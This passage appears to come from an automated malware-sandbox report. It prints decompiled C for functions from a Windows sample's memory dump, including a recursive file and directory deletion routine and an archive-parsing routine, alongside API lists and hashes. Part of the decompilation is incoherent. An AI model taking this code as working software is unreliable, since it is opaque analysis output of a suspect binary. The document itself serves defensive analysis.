                                          • Instruction Fuzzy Hash: 05B01275002000FBCF022F40ED0448DBF21EB48311B20C465F05A81031C732C421BB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401303, Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00401303(void* __ecx, void* __eflags) {
				intOrPtr* _t9;
				intOrPtr* _t10;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t23;
				void* _t25;

				_t25 = __ecx;
				_t9 = E0040115F(__ecx);
				if(_t9 == 0) {
					_push(0xc);
					L0041C16C();
					if(_t9 == 0) {
						_t23 = 0;
					} else {
						 *((intOrPtr*)(_t9 + 4)) = 0x41f7c4;
						 *((intOrPtr*)(_t9 + 8)) = 0;
						 *_t9 = 0x41d5f0;
						 *((intOrPtr*)(_t9 + 4)) = 0x41d5e0;
						_t23 = _t9;
					}
					_t10 =  *((intOrPtr*)(_t25 + 4));
					 *((intOrPtr*)( *_t10 + 0x10))(_t10, 0, 0, 0, 0);
					_t12 =  *((intOrPtr*)(_t25 + 8));
					_t13 =  *((intOrPtr*)( *_t12 + 0xc))(_t12,  *((intOrPtr*)(_t25 + 4)), 0x41ea98, _t23);
					asm("sbb al, al");
					return  ~_t13 + 1;
				} else {
					return 1;
				}
			}









                                          0x00401304
                                          0x00401306
                                          0x0040130d
                                          0x00401314
                                          0x00401316
                                          0x00401320
                                          0x0040133d
                                          0x00401322
                                          0x00401322
                                          0x00401329
                                          0x0040132c
                                          0x00401332
                                          0x00401339
                                          0x00401339
                                          0x0040133f
                                          0x00401349
                                          0x0040134c
                                          0x0040135c
                                          0x00401361
                                          0x00401367
                                          0x0040130f
                                          0x00401312
                                          0x00401312

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: 530541863fe87d91b3746bc2cb94423826a85f1004adc9c1c8b154fef11766d7
                                          • Instruction ID: a51787965d0bc3bdbe74b998de211b2743835052462f3d0f1d26fd9b701dad35
                                          • Opcode Fuzzy Hash: 530541863fe87d91b3746bc2cb94423826a85f1004adc9c1c8b154fef11766d7
                                          • Instruction Fuzzy Hash: 45F0C8B1500221AFD7189F65D80AD977B99EF85710315C46FF406CB3A1D7B4EC82C668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414EF1, Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00414EF1(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr* _a16) {
				void* _t12;
				signed int _t13;
				signed int _t15;
				intOrPtr* _t20;
				intOrPtr _t24;

				_t24 = _a4;
				_push( &_a12);
				_t12 = E00413ECE(_t24 + 0x14, _a8, _a12); // executed
				_t20 = _a16;
				if(_t20 != 0) {
					 *_t20 = _a12;
				}
				if(_t12 != 0) {
					return 0;
				}
				_t13 = GetLastError();
				__eflags =  *(_t24 + 0x1c);
				if( *(_t24 + 0x1c) != 0) {
					return  *((intOrPtr*)( *( *(_t24 + 0x1c))))( *((intOrPtr*)(_t24 + 0x20)), _t13);
				}
				__eflags = _t13;
				if(__eflags == 0) {
					return 0x80004005;
				}
				if(__eflags > 0) {
					_t15 = _t13 & 0x0000ffff | 0x80070000;
					__eflags = _t15;
					return _t15;
				}
				return _t13;
			}








                                          0x00414ef5
                                          0x00414efb
                                          0x00414f05
                                          0x00414f0a
                                          0x00414f0f
                                          0x00414f14
                                          0x00414f14
                                          0x00414f18
                                          0x00000000
                                          0x00414f1a
                                          0x00414f1e
                                          0x00414f24
                                          0x00414f28
                                          0x00000000
                                          0x00414f33
                                          0x00414f37
                                          0x00414f39
                                          0x00000000
                                          0x00414f3b
                                          0x00414f42
                                          0x00414f49
                                          0x00414f49
                                          0x00000000
                                          0x00414f49
                                          0x00414f50

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?), ref: 00414F1E
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: bef10e7e2a07b9f5c5ee5c354b4214a9f3a8dc7b1ff6031b8d50112c379913c8
                                          • Instruction ID: b1376db512650cee24e8a0985b829a0f1c4315c93205b2e563ae2ffb9e13b3f5
                                          • Opcode Fuzzy Hash: bef10e7e2a07b9f5c5ee5c354b4214a9f3a8dc7b1ff6031b8d50112c379913c8
                                          • Instruction Fuzzy Hash: 68F0697120021AABCB20CF10CC00AE777A9BF80324F14456AB806CB360D739E897DB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004145F1, Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E004145F1(signed int* __ecx, void* __eflags, signed int _a4) {
				signed int _t12;
				signed int _t19;
				signed int _t21;

				_t21 = _a4;
				 *__ecx =  *__ecx & 0x00000000;
				_t19 = 2;
				_t12 = (_t21 + 1) * _t19;
				_push( ~(0 | __eflags > 0x00000000) | _t12); // executed
				L0041C16C(); // executed
				__ecx[1] = _t21;
				__ecx[2] = _t21;
				 *__ecx = _t12;
				return _t12;
			}






                                          0x004145f3
                                          0x004145f9
                                          0x00414600
                                          0x00414604
                                          0x0041460d
                                          0x0041460e
                                          0x00414614
                                          0x00414617
                                          0x0041461b
                                          0x0041461e

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: b60de331195480ee16010183974e33a4c9ed5d3fc8d927df9664fc67f0053f17
                                          • Instruction ID: d4bf1e77843ac4ffc9d6de96a583b5b6222411ff98e089cd5882ee9a91c2c0ea
                                          • Opcode Fuzzy Hash: b60de331195480ee16010183974e33a4c9ed5d3fc8d927df9664fc67f0053f17
                                          • Instruction Fuzzy Hash: A8E012735452116FD3288F2ED507A97F7E8EFD0720F14C92FE59AC72A0DAB4A8818A54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040287B, Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E0040287B(void* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t3;
				void* _t9;
				void* _t10;

				_t9 = __edx;
				_push(0x18);
				_t10 = __ecx; // executed
				L0041C16C(); // executed
				if(__eax == 0) {
					_t3 = 0;
				} else {
					_t3 = E00402544(__eax, _a4);
				}
				return E0041B205(_t10, _t9, _t3);
			}






                                          0x0040287b
                                          0x0040287c
                                          0x0040287e
                                          0x00402880
                                          0x00402888
                                          0x00402897
                                          0x0040288a
                                          0x00402890
                                          0x00402890
                                          0x004028a2

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: b306a9075f87c046829b446e6b913b62a4123f536a9e901663e4365a709dde56
                                          • Instruction ID: ab72d40478e811afedcfbbedf7c0c76e7f17da6d593c58ae3af9d4d4ec47094f
                                          • Opcode Fuzzy Hash: b306a9075f87c046829b446e6b913b62a4123f536a9e901663e4365a709dde56
                                          • Instruction Fuzzy Hash: ADD0227634073121CA5831325D29ABF49844F81724B05883FB405E62D1CEBDCC82829D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BE10, Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041BE10(int __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = malloc(__ecx); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                          0x0041be12
                                          0x0041be18
                                          0x0041be21
                                          0x0041be14
                                          0x0041be16
                                          0x0041be16

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          • Opcode ID: 66cf8d5545a740dad15543452bf8420ea65b41da3c9faaad57c398a04622ebbf
                                          • Instruction ID: a99900dced4b3d94408e193d7e854b8781f3078c90807f01ec2a5ee1b4dfafb1
                                          • Opcode Fuzzy Hash: 66cf8d5545a740dad15543452bf8420ea65b41da3c9faaad57c398a04622ebbf
                                          • Instruction Fuzzy Hash: B2B012F051110102DE1C07347C040D732506650607BC048B8B402C0210F729C425504D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BE30, Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 5bb76444f12f6ac46b839af03aa649dedf6af210799dfe73033db5ebb4548707
                                          • Instruction ID: 87b19333b2ef4116d6254c4bc8fef081bf6be047992dbd34729973d037981491
                                          • Opcode Fuzzy Hash: 5bb76444f12f6ac46b839af03aa649dedf6af210799dfe73033db5ebb4548707
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00403327, Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00403327(WCHAR* __ecx, void* __edx, void* __eflags) {
				WCHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				void* _t26;
				int _t29;
				int _t36;
				int _t37;
				int _t44;
				WCHAR* _t45;
				void* _t54;

				_t54 = __edx;
				_t45 = __ecx;
				E00414803( &_v16, __ecx);
				E00414922( &_v16, 0x41dbcc);
				_t26 = FindFirstFileW(_v16,  &_v612);
				_v20 = _t26;
				if(_t26 == 0xffffffff) {
					L11:
					SetCurrentDirectoryW( *0x422794);
					if(SetFileAttributesW(_t45, 0) == 0 || RemoveDirectoryW(_t45) == 0) {
						goto L14;
					} else {
						_push(_v16);
						L0041C160();
						_t29 = 1;
					}
				} else {
					do {
						E00414864( &_v16, _t45);
						E00401585( &_v16, 0x5c);
						E00414922( &_v16,  &(_v612.cFileName));
						if((_v612.dwFileAttributes & 0x00000010) == 0) {
							_t36 = SetFileAttributesW(_v16, 0);
							__eflags = _t36;
							if(_t36 == 0) {
								goto L14;
							} else {
								_t37 = DeleteFileW(_v16);
								goto L8;
							}
						} else {
							if(lstrcmpW( &(_v612.cFileName), 0x41dbc8) == 0) {
								goto L9;
							} else {
								_t44 = lstrcmpW( &(_v612.cFileName), 0x41dbc0);
								_t61 = _t44;
								if(_t44 == 0) {
									goto L9;
								} else {
									_t37 = E00403327(_v16, _t54, _t61);
									L8:
									if(_t37 == 0) {
										L14:
										_push(_v16);
										L0041C160();
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L9;
									}
								}
							}
						}
						goto L15;
						L9:
					} while (FindNextFileW(_v20,  &_v612) != 0);
					FindClose(_v20);
					goto L11;
				}
				L15:
				return _t29;
			}













                                          0x00403327
                                          0x00403332
                                          0x00403339
                                          0x00403346
                                          0x00403355
                                          0x00403361
                                          0x00403367
                                          0x00403405
                                          0x0040340b
                                          0x00403418
                                          0x00000000
                                          0x00403425
                                          0x00403425
                                          0x00403428
                                          0x0040342f
                                          0x0040342f
                                          0x0040336d
                                          0x00403373
                                          0x00403377
                                          0x00403381
                                          0x00403390
                                          0x0040339c
                                          0x004033d1
                                          0x004033d3
                                          0x004033d5
                                          0x00000000
                                          0x004033d7
                                          0x004033da
                                          0x00000000
                                          0x004033da
                                          0x0040339e
                                          0x004033ae
                                          0x00000000
                                          0x004033b0
                                          0x004033bc
                                          0x004033be
                                          0x004033c0
                                          0x00000000
                                          0x004033c2
                                          0x004033c5
                                          0x004033e0
                                          0x004033e2
                                          0x00403432
                                          0x00403432
                                          0x00403435
                                          0x0040343a
                                          0x0040343a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004033e2
                                          0x004033c0
                                          0x004033ae
                                          0x00000000
                                          0x004033e4
                                          0x004033f4
                                          0x004033ff
                                          0x00000000
                                          0x004033ff
                                          0x0040343c
                                          0x00403441

                                          APIs
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                          • FindFirstFileW.KERNEL32(?,?,0041DBCC,?,00000000,?,00000000), ref: 00403355
                                          • lstrcmpW.KERNEL32(?,0041DBC8,?,0000005C,?), ref: 004033AA
                                          • lstrcmpW.KERNEL32(?,0041DBC0), ref: 004033BC
                                          • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?), ref: 004033D1
                                          • DeleteFileW.KERNEL32(?), ref: 004033DA
                                          • FindNextFileW.KERNEL32(?,00000010), ref: 004033EE
                                          • FindClose.KERNEL32(?), ref: 004033FF
                                          • SetCurrentDirectoryW.KERNEL32 ref: 0040340B
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00403414
                                          • RemoveDirectoryW.KERNEL32(?), ref: 0040341B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403428
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403435
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$??3@Findmemcpy$AttributesDirectorylstrcmp$??2@CloseCurrentDeleteFirstNextRemove
                                          • String ID:
                                          • API String ID: 1254520193-0
                                          • Opcode ID: c2933ececad9db255eb8dd321e99e6543c18a313ac2d2f0f1027302c6f341fa2
                                          • Instruction ID: 3c0acd77c11c6bfbf9789e5db0a8688aa55c6e9eafbf1e7d600da6e85a924ae8
                                          • Opcode Fuzzy Hash: c2933ececad9db255eb8dd321e99e6543c18a313ac2d2f0f1027302c6f341fa2
                                          • Instruction Fuzzy Hash: 0531A271D00119BADB10AFA1ED85EEF7B7CAF00701F1045B6A412B20E1EB799E00CA18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A836, Relevance: 11.0, APIs: 7, Instructions: 450COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E0041A836(signed int __ecx, signed int __edx, signed int _a4, char _a8, short _a12, signed int _a16, intOrPtr _a20, char _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, void* _a48, signed int _a52, signed int _a56, signed int _a60, signed int _a64, signed int _a68, signed int _a72, signed int _a76, signed int _a80, intOrPtr _a84, signed int _a88, signed int _a92, signed int _a96, void* _a100, signed int _a108, signed int _a112, unsigned int _a116, signed int _a120, signed int _a124) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v104;
				char _v117;
				void* _v176;
				void* __ebx;
				signed int __edi;
				char* __esi;
				void* __ebp;
				void* _t374;
				signed int _t377;
				signed int _t387;
				intOrPtr* _t391;
				signed int _t395;
				signed int _t396;
				signed int _t407;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				void* _t413;
				void* _t415;
				signed int _t419;
				void* _t423;
				signed int _t426;
				signed int _t438;
				void* _t456;
				signed int _t458;
				signed int _t459;
				signed int _t460;
				intOrPtr* _t461;
				signed int _t462;
				signed int _t465;
				signed int _t467;
				signed int _t479;
				signed int _t486;
				void* _t489;
				signed int _t490;
				intOrPtr _t501;
				unsigned int _t503;
				void* _t505;
				void* _t506;
				signed int _t513;
				void* _t521;
				signed int _t556;
				void* _t571;
				signed int _t572;
				signed int _t573;
				signed int _t575;
				signed int _t579;
				signed int _t582;
				signed int _t584;
				intOrPtr _t585;
				signed int _t587;
				intOrPtr* _t589;
				intOrPtr* _t590;
				signed int _t592;
				signed int _t594;
				intOrPtr* _t598;
				signed int _t599;
				void* _t602;
				void* _t603;

				_t570 = __edx;
				_t599 =  &_v104;
				_t603 = _t602 - 0x90;
				_t592 = __ecx;
				_t374 = E00418FB1( *((intOrPtr*)(__ecx + 0x38)));
				_t486 = _a108;
				if(_t374 != 2) {
					_t582 = 0;
					__eflags = 0;
				} else {
					_t582 = 0;
					_t609 = __edx;
					if(__edx == 0) {
						E004197F9(__ecx, __edx, _t609, _t486 + 0xe0);
						_t374 = E00418FB1( *((intOrPtr*)(_t592 + 0x38)));
					}
				}
				_a72 = _t582;
				_a76 = _t582;
				_a80 = _t582;
				if(_t374 != 3) {
					L9:
					_a36 = _t582;
					_a40 = _t582;
					_a44 = _t582;
					_v44 = _t582;
					_v40 = _t582;
					_v36 = _t582;
					_v32 = _t582;
					_v28 = _t582;
					_v24 = _t582;
					__eflags = _t374 - 4;
					if(_t374 == 4) {
						__eflags = _t570 - _t582;
						if(__eflags == 0) {
							_t589 = _t486 + 0xf8;
							E0041A533(_t486, _t592, _t570, _t592, __eflags,  &_a72, _t589, _t486,  &_a36,  &_v44);
							 *_t589 =  *_t589 +  *((intOrPtr*)(_t486 + 0xf0));
							asm("adc [edi+0x4], eax");
							_t374 = E00418FB1( *((intOrPtr*)(_t592 + 0x38)));
							_t582 = 0;
							__eflags = 0;
						}
					}
					 *(_t486 + 0x5c) = _t582;
					__eflags = _t374 - 5;
					if(__eflags != 0) {
						L85:
						E00419590(_t486, _t486, _t570, __eflags);
						_push(_v32);
						L0041C160();
						_push(_v44);
						L0041C160();
						_push(_a36);
						L0041C160();
						E0041969C( &_a72);
						_t377 = 0;
						__eflags = 0;
						goto L86;
					} else {
						__eflags = _t570 - _t582;
						if(__eflags == 0) {
							_a108 = E00418FE5( *((intOrPtr*)(_t592 + 0x38)), _t570, _t592, __eflags);
							E00419233(_t486 + 0x58, _t378);
							 *(_t486 + 0x5c) = _a108;
							E00419652(_t486 + 0x108, _t570, 9, _t582);
							E00419652(_t486 + 0x108, _t570, 6, _t582);
							__eflags = _a108 - _t582;
							if(__eflags > 0) {
								__eflags = _v40 - _t582;
								if(__eflags != 0) {
									E00419652(_t486 + 0x108, _t570, 0xa, _t582);
								}
							}
							_t584 = _a108;
							_a60 = 0;
							_a64 = 0;
							_a68 = 0;
							E00419725( &_a60, _t584, __eflags);
							_a24 = 0;
							_a28 = 0;
							_a32 = 0;
							_a48 = 0;
							_a52 = 0;
							_a56 = 0;
							_a124 = 0;
							while(1) {
								L67:
								_t387 = E00418FB1( *((intOrPtr*)(_t592 + 0x38)));
								_t501 =  *((intOrPtr*)(_t592 + 0x38));
								_a92 = _t387;
								__eflags = _t387 | _t570;
								_a96 = _t570;
								if((_t387 | _t570) == 0) {
									break;
								}
								_a84 = E00418FB1(_t501);
								_t390 =  *((intOrPtr*)(_t592 + 0x38));
								_t503 =  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 8));
								_a88 = _t570;
								_t570 = 0;
								__eflags = _a88;
								if(__eflags > 0) {
									L87:
									_t391 = E00418DE4(_t503, _t584);
									asm("cdq");
									asm("stosd");
									asm("stosd");
									_t505 = _t503 + 2;
									_t571 = _t570 + _t505;
									asm("stosd");
									_t506 = _t505 + 1;
									 *((intOrPtr*)(_t571 + 0x41 + _t599 * 4)) =  *((intOrPtr*)(_t571 + 0x41 + _t599 * 4)) + _t391;
									 *0x120041ac =  *0x120041ac + _t506;
									asm("lodsb");
									 *_t584 =  *_t584 + _t571;
									asm("lodsb");
									 *_t391 =  *_t391 + _t391;
									asm("stosd");
									 *((intOrPtr*)(_t592 - 0x54)) =  *((intOrPtr*)(_t592 - 0x54)) + _t571;
									 *((intOrPtr*)(_t592 - 0x54)) =  *((intOrPtr*)(_t592 - 0x54)) + _t571;
									_t489 = _t486 + _t486 + _t571;
									asm("stosd");
									 *_t584 =  *_t584 + _t489;
									asm("lodsb");
									_t513 = _t506 + 7;
									_t268 =  &_v117;
									 *_t268 = _v117 + _t571;
									__eflags =  *_t268;
									_push(_t599);
									_push(_t489);
									_push(_t592);
									_push(_t584);
									_t585 =  *((intOrPtr*)(_t603 + 8));
									_t594 = _t513;
									E00418567(_t585);
									 *((intOrPtr*)(_t585 + 0xe8)) =  *((intOrPtr*)(_t594 + 0x40));
									 *((intOrPtr*)(_t585 + 0xec)) =  *((intOrPtr*)(_t594 + 0x44));
									 *(_t585 + 0xe0) =  *((intOrPtr*)(_t594 + 0x56));
									_t490 = 0;
									 *((char*)(_t585 + 0xe1)) =  *((intOrPtr*)(_t594 + 0x57));
									__eflags =  *(_t585 + 0xe0);
									if( *(_t585 + 0xe0) != 0) {
										L104:
										_t395 = 0;
										__eflags = 0;
										goto L105;
									} else {
										_t572 =  *(_t594 + 0x5c);
										_v20 =  *((intOrPtr*)(_t594 + 0x60));
										_v12 =  *((intOrPtr*)(_t594 + 0x64));
										_v8 =  *((intOrPtr*)(_t594 + 0x68));
										_a4 =  *((intOrPtr*)(_t594 + 0x6c));
										asm("adc ecx, ebx");
										_v24 = _t572;
										 *((intOrPtr*)(_t585 + 0xf0)) =  *((intOrPtr*)(_t594 + 0x40)) + 0x20;
										 *((intOrPtr*)(_t585 + 0xf4)) =  *((intOrPtr*)(_t594 + 0x44));
										 *((intOrPtr*)(_t585 + 0x128)) = 0x20;
										 *((intOrPtr*)(_t585 + 0x12c)) = 0;
										 *((char*)(_t585 + 0x130)) = 0;
										__eflags = _v20;
										if(__eflags < 0) {
											goto L104;
										} else {
											if(__eflags > 0) {
												L92:
												__eflags = _v8 - 0x40000000;
												if(__eflags > 0) {
													goto L104;
												} else {
													if(__eflags < 0) {
														L95:
														_t395 = _v12 | _v8;
														__eflags = _t395;
														if(_t395 != 0) {
															__eflags =  *((intOrPtr*)(_t585 + 0x134)) - _t490;
															if( *((intOrPtr*)(_t585 + 0x134)) == _t490) {
																 *((char*)(_t585 + 0x130)) = 1;
															}
															asm("adc ecx, ebx");
															 *((intOrPtr*)(_t594 + 0x70)) =  *((intOrPtr*)(_t594 + 0x70)) + _v12 + 0x20;
															asm("adc [esi+0x74], ecx");
															_t407 = _v12 + _t572;
															_t573 = _v8;
															asm("adc edx, [ebp-0x10]");
															_v32 = _t407;
															asm("adc ecx, ebx");
															 *((intOrPtr*)(_t585 + 0x128)) = _t407 + 0x20;
															 *((intOrPtr*)(_t585 + 0x12c)) = _t573;
															_t521 =  *((intOrPtr*)(_t594 + 0x48)) -  *((intOrPtr*)(_t585 + 0xf0));
															asm("sbb eax, [edi+0xf4]");
															__eflags =  *((intOrPtr*)(_t594 + 0x4c)) - _t573;
															if(__eflags > 0) {
																L107:
																_t410 =  *_t594;
																_t396 =  *((intOrPtr*)( *_t410 + 0x10))(_t410, _v24, _v20, 1, _t490);
																__eflags = _t396 - _t490;
																if(_t396 == _t490) {
																	_t411 = _v12;
																	__eflags = _t411 - _t411;
																	if(_t411 != _t411) {
																		L110:
																		_t396 = 0x8007000e;
																	} else {
																		__eflags = _t490 - _v8;
																		if(_t490 == _v8) {
																			_push(_v12);
																			L0041C16C();
																			_v32 = _t411;
																			_t412 = E0041670E(_v12); // executed
																			__eflags = _t412 - _t490;
																			if(_t412 == _t490) {
																				_t575 = _v12;
																				_t525 = _v32;
																				_t413 = E0041BCE0(_v32, _t575);
																				__eflags = _t413 - _a4;
																				if(_t413 != _a4) {
																					L115:
																					E00418DE4(_t525, _t585);
																				}
																				__eflags =  *((intOrPtr*)(_t585 + 0x134)) - _t490;
																				if( *((intOrPtr*)(_t585 + 0x134)) == _t490) {
																					 *((char*)(_t585 + 0x131)) = 1;
																				}
																				_push(_t490);
																				_v20 = _t490;
																				E004192D4( &_v24, _t594, _v32, _v12);
																				_t525 =  *((intOrPtr*)(_t594 + 0x38));
																				_v16 = _t490;
																				_v12 = _t490;
																				_v8 = _t490;
																				_t415 = E00418FB1( *((intOrPtr*)(_t594 + 0x38)));
																				__eflags = _t415 - 1;
																				if(_t415 != 1) {
																					L120:
																					__eflags = _t415 - 0x17;
																					if(_t415 != 0x17) {
																						goto L115;
																					} else {
																						__eflags = _t575 - _t490;
																						if(__eflags != 0) {
																							goto L115;
																						} else {
																							_push(_a20);
																							_push(_a16);
																							_t525 = _t594;
																							_push(_a12);
																							_t419 = E0041A63E(_t594, _t575, __eflags,  *((intOrPtr*)(_t585 + 0xf0)),  *((intOrPtr*)(_t585 + 0xf4)), _t585 + 0x100,  &_v16, _a8);
																							_a4 = _t419;
																							__eflags = _t419 - _t490;
																							if(_t419 == _t490) {
																								__eflags = _v12 - _t490;
																								if(_v12 != _t490) {
																									__eflags = _v12 - 1;
																									if(_v12 > 1) {
																										goto L115;
																									} else {
																										E00418E1D( &_v24);
																										E004192FE(_t594,  *_v16);
																										_t525 =  *((intOrPtr*)(_t594 + 0x38));
																										_t423 = E00418FB1( *((intOrPtr*)(_t594 + 0x38)));
																										__eflags = _t423 - 1;
																										if(_t423 != 1) {
																											goto L115;
																										} else {
																											__eflags = _t575 - _t490;
																											if(_t575 != _t490) {
																												goto L115;
																											} else {
																												goto L129;
																											}
																										}
																									}
																								} else {
																									E0041969C( &_v16);
																									E00418E1D( &_v24);
																									goto L113;
																								}
																							} else {
																								E0041969C( &_v16);
																								E00418E1D( &_v24);
																								_t490 = _a4;
																								goto L113;
																							}
																						}
																					}
																				} else {
																					__eflags = _t575 - _t490;
																					if(_t575 == _t490) {
																						L129:
																						 *((char*)(_t585 + 0x130)) = 1;
																						 *((intOrPtr*)(_t585 + 0x120)) =  *((intOrPtr*)(_t594 + 0x70));
																						 *((intOrPtr*)(_t585 + 0x124)) =  *((intOrPtr*)(_t594 + 0x74));
																						_t426 = E0041A836(_t594, _t575, _t585, _a8, _a12, _a16, _a20);
																						E0041969C( &_v16);
																						E00418E1D( &_v24);
																						_push(_v32);
																						L0041C160();
																						_t396 = _t426;
																					} else {
																						goto L120;
																					}
																				}
																			} else {
																				_t490 = _t412;
																				L113:
																				_push(_v32);
																				L0041C160();
																				_t396 = _t490;
																			}
																		} else {
																			goto L110;
																		}
																	}
																}
															} else {
																if(__eflags < 0) {
																	L103:
																	 *((char*)(_t585 + 0x133)) = 1;
																	goto L104;
																} else {
																	__eflags = _t521 - _v32;
																	if(_t521 >= _v32) {
																		goto L107;
																	} else {
																		goto L103;
																	}
																}
															}
														} else {
															__eflags = _t572 | _v20;
															if((_t572 | _v20) != 0) {
																L105:
																_t396 = _t395 + 1;
																__eflags = _t396;
															} else {
